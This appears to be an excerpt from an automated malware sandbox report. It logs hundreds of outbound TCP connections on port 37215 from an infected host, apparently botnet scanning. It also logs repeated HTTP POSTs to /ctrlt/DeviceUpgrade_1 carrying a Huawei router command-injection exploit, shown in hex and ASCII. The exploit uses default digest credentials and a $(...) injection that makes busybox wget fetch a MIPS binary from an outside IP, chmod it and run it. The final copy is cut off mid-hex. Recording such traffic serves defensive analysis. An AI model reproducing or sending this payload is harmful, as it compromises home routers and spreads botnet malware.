              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.195.244.243:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.213.241.124:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.131.130.215:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.20.130.219:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.115.27.113:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.128.209.205:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.239.253.205:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.100.173.181:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.70.144.6:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.71.239.105:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.42.179.160:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.123.175.31:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.227.9.105:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.44.207.250:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.107.162.156:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.128.78.165:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.241.208.27:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.69.164.218:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.68.45.254:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.75.162.211:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.214.131.216:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.74.157.162:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.34.151.177:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.30.183.65:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.138.13.247:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.162.183.120:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.239.71.102:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.189.51.230:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.172.117.124:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.227.129.49:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.241.89.36:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.116.179.59:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.244.59.239:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.81.181.80:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.243.11.254:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.126.136.217:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.237.229.192:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.155.201.63:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.65.177.253:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.15.126.70:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.50.157.154:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.120.70.60:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.52.251.29:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.64.113.172:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.95.241.247:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.16.20.171:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.57.13.197:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.75.173.130:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.151.4.204:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.62.119.171:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.174.31.93:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.152.118.70:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.214.130.44:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.92.10.152:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.92.53.187:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.192.210.151:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.195.7.55:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.158.146.198:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.175.114.38:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.73.246.173:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.54.22.36:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.83.193.204:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.156.22.15:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.137.142.107:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.37.32.185:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.7.7.143:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.157.89.239:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.141.90.31:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.44.176.212:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.113.43.82:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.58.241.155:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.69.201.238:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.207.243.254:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.105.27.105:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.46.53.63:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.8.193.98:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.88.247.237:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.128.168.241:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.95.58.241:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.243.32.176:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.5.68.44:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.137.125.32:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.153.95.85:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.96.16.110:37215
              Source: global trafficTCP traffic: 192.168.2.15:58374 -> 212.64.199.23:59666
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.67.184.253:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.199.220.66:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.91.54.114:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.142.203.98:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.180.119.224:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.156.40.0:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.97.101.22:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.101.217.173:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.39.198.139:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.206.190.52:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.174.160.90:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.145.171.234:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.72.239.116:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.154.244.124:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.115.31.84:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.36.79.73:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.78.183.99:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.102.30.191:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.221.126.216:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.211.70.50:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.62.214.204:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.137.249.75:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.167.233.203:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.136.209.70:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.132.89.117:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.168.223.182:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.4.98.58:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.23.214.217:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.62.234.46:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.95.128.150:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.223.188.133:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.47.155.53:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.178.78.162:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.43.72.243:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.196.101.247:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.167.212.240:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.57.87.208:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.155.68.194:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.186.195.39:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.148.210.50:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.12.249.93:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.1.120.19:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.56.80.9:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.172.38.7:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.133.153.52:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.28.57.36:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.2.167.49:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.180.179.49:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.91.214.203:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.128.200.20:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.205.23.33:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.48.3.35:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.192.57.242:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.147.92.110:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.120.15.117:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.160.208.152:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.29.133.47:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.134.236.88:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.108.253.145:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.175.83.182:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.246.22.244:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.129.217.68:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.230.123.200:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.31.58.220:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.96.173.243:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.110.109.224:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.131.171.196:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.210.225.148:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.162.210.169:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.161.54.138:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.147.67.140:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.230.91.188:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.170.209.218:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.33.95.74:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.105.166.69:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.187.30.220:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.47.237.71:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.36.87.152:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.37.204.223:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.112.84.152:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.208.152.253:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.185.105.219:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.63.230.87:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.95.104.71:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.238.144.180:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.193.210.211:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.225.15.14:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.151.223.40:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.8.252.43:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.185.11.190:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.72.200.195:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.85.0.29:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.223.105.109:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.121.170.122:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.81.2.154:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.183.247.93:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.218.90.56:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.59.223.140:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.232.60.202:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.226.81.72:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.73.89.137:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.187.209.86:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.20.98.222:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.198.152.2:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.104.84.184:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.159.177.28:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.90.252.125:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.215.4.255:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.163.240.159:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.4.91.249:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.118.12.228:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.120.176.241:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.182.241.153:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.84.113.183:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.188.195.157:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.45.254.93:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.5.57.190:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.74.221.53:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.136.249.33:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.53.176.139:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.5.233.134:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.232.151.43:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.219.85.236:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.73.184.33:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.169.93.172:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.120.230.24:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.162.218.0:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.64.70.178:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.40.34.128:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.61.241.191:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.109.175.142:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.181.137.157:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.89.240.196:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.167.20.30:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.51.219.240:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.86.171.165:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.7.127.219:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.172.210.170:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.250.97.113:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.31.67.218:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.76.137.229:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.238.92.224:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.102.121.128:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.127.218.167:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.0.56.202:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.48.198.69:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.88.174.221:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.90.202.69:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.33.7.129:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.138.194.192:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.97.28.18:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.44.23.52:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.97.101.179:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.100.34.143:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.222.212.88:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.216.177.25:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.249.3.24:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.92.131.224:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.213.135.227:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.240.6.159:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.245.93.164:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.122.212.117:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.237.228.7:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.245.249.116:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.217.234.92:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.135.179.102:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.93.243.71:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.223.111.24:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.136.232.142:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 197.154.156.50:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.89.120.178:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.85.26.79:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.188.84.16:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.31.80.151:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.235.179.110:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 41.13.123.45:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.187.53.233:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.183.1.117:37215
              Source: global trafficTCP traffic: 192.168.2.15:10640 -> 156.242.103.42:37215
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 